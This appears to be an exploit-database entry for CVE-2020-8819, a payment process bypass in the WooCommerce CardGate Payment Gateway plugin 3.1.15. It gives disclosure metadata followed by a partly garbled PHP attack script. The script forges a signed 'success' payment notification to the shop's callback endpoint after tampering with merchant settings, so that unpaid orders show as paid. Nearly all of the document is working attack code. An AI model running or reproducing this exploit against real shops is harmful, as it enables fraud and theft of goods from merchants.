# Exploit Title: WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass # Discovery Date: 2020-02-02 # Public Disclosure Date: 2020-02-22 # Exploit Author: GeekHack # Vendor Homepage: https://www.cardgate.com (www.curopayments.com) # Software Link: https://github.com/cardgate/woocommerce/releases/tag/v3.1.15 # Version: <= 3.1.15 # Tested on: WordPress 5.3.2 + WooCommerce 3.9.1 + CardGate Payment Gateway Plugin 3.1.15 # CVE: CVE-2020-8819 $_REQUEST['testmode'], 'reference' => random_int(10000000000, 99999999999) . ORDER, 'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)), 'currency' => '', 'amount' => 0, 'status' => 'success', 'code' => 200 ]; $payload['hash'] = md5( (!empty($payload['testmode']) ? 'TEST' : '') . $payload['transaction'] . $payload['currency'] . $payload['amount'] . $payload['reference'] . $payload['code'] . $aConfigData['site_key'] ); $response = doRequest(TARGET . '/?cgp_notify=true', $payload); if ($response == $payload['transaction'] . '.' . $payload['code']) { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } else { throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)"); } } else { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } } else { throw new Exception("It seems target is not vulnerable ($response)"); } } catch (\Exception $oException_) { die(htmlspecialchars($oException_->getMessage())); } }